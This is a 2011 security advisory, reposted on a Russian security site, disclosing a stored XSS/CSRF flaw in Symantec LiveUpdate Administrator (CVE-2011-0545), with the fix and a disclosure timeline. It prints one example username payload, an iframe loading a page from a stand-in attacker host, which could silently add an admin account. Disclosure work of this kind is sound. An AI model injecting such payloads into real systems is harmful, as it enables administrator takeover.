Информационная безопасность
[RU] switch to English


Дополнительная информация

  Межсайтовая подмена запросов в Symantec LiveUpdate Administrator

From:NSO Research <nso-research_(at)_sotiriu.de>
Date:23 марта 2011 г.
Subject:NSOADV-2011-001: Symantec LiveUpdate Administrator CSRF vulnerability

______________________________________________________________________

NSOADV-2011-001: Symantec LiveUpdate Administrator CSRF vulnerability
______________________________________________________________________
______________________________________________________________________

                              111101111
                       11111 00110 00110001111
                  111111 01 01 1 11111011111111
               11111  0 11 01 0 11 1 1  111011001
            11111111101 1 11 0110111  1    1111101111
          1001  0 1 10 11 0 10 11 1111111  1 111 111001
        111111111 0 10 1111 0 11 11 111111111 1 1101 10
       00111 0 0 11 00 0 1110 1 1011111111111 1111111 11  100
      10111111 0 01 0  1 1 111110 11 1111111111111  11110000011
      0111111110 0110 1110 1 0 11101111111111111011 11100  00
      01111 0 10 1110 1 011111 1 111111111111111111111101 01
      01110 0 10 111110 110 0 11101111111111111111101111101
     111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111
     111110110 10 0111110 1 0 0 1111111111111111111111111 110
   111 11111 1  1 111 1   10011 101111111111011111111 0   1100
  111 10  110 101011110010   11111111111111111111111 11 0011100
  11 10     001100     0001      111111111111111111 10 11 11110
 11110       00100      00001     10 1  1111  101010001 11111111
 11101        0  1011     10000    00100 11100        00001101 0
 0110         111011011             0110   10001        101 11110
 1011                 1             10 101   000001        01   00
  1010 1                              11001      1 1        101  10
     110101011                          0 101                 11110
           110000011
                     111
______________________________________________________________________
______________________________________________________________________

 Title:                  Symantec LiveUpdate Administrator CSRF
                         vulnerability
 Severity:               Medium
 Advisory ID:            NSOADV-2011-001
 Found Date:             14.07.2010
 Date Reported:          17.01.2011
 Release Date:           22.03.2011
 Author:                 Nikolas Sotiriu
 Mail:                   nso-research at sotiriu.de
 Website:                http://sotiriu.de/
 Twitter:                http://twitter.com/nsoresearch
 Advisory-URL:           http://sotiriu.de/adv/NSOADV-2010-001.txt
 Vendor:                 Symantec (http://www.symantec.com/)
 Affected Products:      Symantec LiveUpdate Administrator <= 2.2.2.9
 Remote Exploitable:     Yes
 Local Exploitable:      No
 CVE-ID:                 CVE-2011-0545
 Patch Status:           Vendor released an patch
 Discovered by:          Nikolas Sotiriu
 Disclosure Policy:      http://sotiriu.de/policy.html
 Thanks to:              Thierry Zoller: For the permission to use his
                                         Policy



Background:
===========

The Symantec LiveUpdate Administrator is an enterprise Web application
that allows you to manage Symantec updates on multiple internal Central
LiveUpdate servers, called Distribution Centers. Using the Symantec
LiveUpdate Administrator, you download updates to the Manage Updates
folder, and then publish the updates to production distribution servers
for LiveUpdate clients to download, or to testing distribution centers,
so that the updates can be tested before they are published to production.

You can download and publish updates on schedule, allowing you to create
a low maintenance, reliable system that can be set up once, and then run
automatically. Updates can also be manually downloaded and published as
needed.

(Product description from LUA Admin Guide)



Description:
============

The webfrontend do not properly sanitize some variables before being
returned to the user.

If an attacker supplies a username, containing script code, at the
login-page of the service, an entry in the Event Log is done, containing
the "user name".

If the admin user is viewing the logfile, the script code will be
executed.

This can be exploited to execute arbitrary HTML and script code in a
admin's browser session in context of the Web Administrator frontend.

If an attacker passes a user name like

<iframe src=http://attacker/evil.html>

in the username field he can execute CSRF attacks against the
Webfrontend to change the settings.

The Proof of Concept code addes an admin account or executes an alert box.




Proof of Concept :
==================

* attached *



Solution:
=========

Update to Version 2.3

Symantec Security Advisory: http://tinyurl.com/4oox6hy



Disclosure Timeline (YYYY/MM/DD):
=================================

2010.07.14: Vulnerability found
2011.01.17: Sent PoC, Advisory, Disclosure policy and planned disclosure
           date (2011.02.04) to Vendor
2011.01.17: Vendor response
2011.01.20: Symantec product team verifies the finding
2011.02.03: Ask for a status update
2011.02.03: Symantec Security Response Team informs me that the update
           is planned for early to mid-March.
2011.02.03: Changed release date to 2011.03.10.
2011.03.03: Symantec Security Response Team informs me that the update
           is planned for 2011.03.17.
2011.03.17: Symantec Security Response Team informs me that the update
           QA needs a bit more time.
2011.03.21: Update and Security Advisory release.
2011.03.22: Release of this Advisory





О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород